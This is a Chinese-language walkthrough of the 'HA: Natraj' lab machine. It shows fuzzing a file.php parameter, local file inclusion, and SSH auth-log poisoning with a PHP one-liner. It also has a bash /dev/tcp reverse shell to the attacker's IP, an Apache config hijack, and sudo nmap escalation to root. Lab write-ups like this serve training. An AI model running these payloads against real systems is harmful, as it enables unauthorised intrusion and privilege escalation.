【offensive-security】2.HA: Natraj靶机
typoraimage-20221025094751654.png
一、获取靶机信息
1.已知信息:
- IP: 192.168.214.80
2.获取信息:
- nmap扫描开启的服务
┌──(lo0p㉿0xlo0p)-[~]
└─$ ping 192.168.214.80
PING 192.168.214.80 (192.168.214.80) 56(84) bytes of data.
64 bytes from 192.168.214.80: icmp_seq=1 ttl=63 time=200 ms
64 bytes from 192.168.214.80: icmp_seq=2 ttl=63 time=206 ms
^C
--- 192.168.214.80 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 199.915/202.932/205.950/3.017 ms
- dirsearch爆破web目录
┌──(lo0p㉿0xlo0p)-[~]
└─$ dirsearch -u 192.168.214.80
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/lo0p/.dirsearch/reports/192.168.214.80_22-10-25_09-09-23.txt
Error Log: /home/lo0p/.dirsearch/logs/errors-22-10-25_09-09-23.log
Target: http://192.168.214.80/
[09:09:23] Starting:
[09:10:06] 200 - 942B - /console/
[09:10:06] 301 - 318B - /console -> http://192.168.214.80/console/
[09:10:15] 200 - 5KB - /images/
[09:10:15] 301 - 317B - /images -> http://192.168.214.80/images/
[09:10:16] 200 - 14KB - /index.html
Task Completed
进入console目录,发现存在file.php,盲猜存在任意文件读取漏洞
typoraimage-20221025095028402.png
- ffuf爆破参数名
┌──(lo0p㉿0xlo0p)-[~]
└─$ ffuf -u 'http://192.168.214.80/console/file.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.214.80/console/file.php?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 0
________________________________________________
file [Status: 200, Size: 1398, Words: 9, Lines: 28]
爆出参数名为file,直接读取/etc/passwd等文件,获取可ssh的用户名共三个:root、natraj、mahakal
- 利用用户登录日志(/var/log/auth.log)进行一句话木马的加载
┌──(lo0p㉿0xlo0p)-[~]
└─$ ssh ""@192.168.214.80
@192.168.214.80's password:
Permission denied, please try again.
将用户名(一句话木马)打进日志中,再利用上面的文件读取漏洞解析这个一句话木马,直接上反弹shell
payload: 192.168.214.80/console/file.php?file=/var/log/auth.log&cmd=bash -c 'exec bash -i %26>%2Fdev%2Ftcp%2F192.168.49.214%2F8888 <%261'
- 查找可利用点
find / -user root -perm -4000 -print 2>/dev/null //查找suid
find / -perm -4000 2>dev/null | xargs ls -la //查找suid并详细展示
find / -writable -type d 2>/dev/null //查找当前权限可写的路径
/dev/mqueue
/dev/shm
/run/lock
/run/lock/apache2
/proc/1291/task/1291/fd
/proc/1291/fd
/proc/1291/map_files
/tmp
/var/www
/var/www/html
/var/www/html/console
/var/www/html/images
/var/tmp
/var/cache/apache2/mod_cache_disk
/var/lib/php/sessions
find / -type f -perm 777 -exec ls -l {} \; 2>/dev/null //查找777文件
-rwxrwxrwx 1 root root 7224 Mar 13 2020 /etc/apache2/apache2.conf
find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root //查找写权限文件
-rwxrwxrwx 1 root root 7224 Mar 13 2020 /etc/apache2/apache2.conf
--w--w--w- 1 root root 0 Oct 24 19:14 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root root 0 Oct 17 19:54 /sys/kernel/security/apparmor/.access
-rw-rw-rw- 1 root root 0 Oct 17 19:54 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root root 0 Oct 17 19:54 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Oct 17 19:54 /sys/kernel/security/apparmor/.replace
发现/etc/apache2/apache2.conf可读写,查看该文件
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
将apache的启动用户改成上面/etc/passwd中获得的用户(root用户除外,apache不允许root用户启动),可获取natraj、mahakal的权限
执行sudo -l查看www-data用户的权限
www-data@ubuntu:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(ALL) NOPASSWD: /bin/systemctl start apache2
(ALL) NOPASSWD: /bin/systemctl stop apache2
(ALL) NOPASSWD: /bin/systemctl restart apache2
发现可以重启apache2,重启后重新反弹shell即可获取natraj、mahakal的权限
┌──(lo0p㉿0xlo0p)-[~]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.49.214] from (UNKNOWN) [192.168.214.80] 36300
bash: cannot set terminal process group (1476): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.
natraj@ubuntu:/var/www/html/console$
继续查看可利用点,natraj貌似没有利用点,换个mahakal
┌──(lo0p㉿0xlo0p)-[~]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.49.214] from (UNKNOWN) [192.168.214.80] 59936
bash: cannot set terminal process group (937): Inappropriate ioctl for device
bash: no job control in this shell
mahakal@ubuntu:/var/www/html/console$ sudo -l
sudo -l
Matching Defaults entries for mahakal on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mahakal may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/nmap
发现mahakal可以利用nmap提权至root
老版本nmap利用:
sudo nmap --interactive #执行nmap的可交互模式
!bash or !sh #进入bash或sh
新版本nmap利用:
echo 'os.execute("/bin/sh")' > /tmp/nse_root.nse
#nse是nmap的插件扩展名
nmap --script=/tmp/nse_root.nse
也可以参考:nmap | GTFOBins
mahakal@ubuntu:/tmp$ TF=$(mktemp)
TF=$(mktemp)
mahakal@ubuntu:/tmp$ echo $TF
mahakal@ubuntu:/tmp$ echo 'os.execute("/bin/bash")' > $TF
mahakal@ubuntu:/tmp$ sudo nmap --script=$TF
Starting Nmap 7.60 ( https://nmap.org ) at 2022-10-24 20:06 PDT
NSE: Warning: Loading '/tmp/tmp.FAkO8IMrkw' -- the recommended file extension is '.nse'.
whoami
root
cd /root
ls
proof.txt
root.txt
cat root.txt
Your flag is in another file...
cat proof.txt
c64360b926ca96882f943b1f10cce059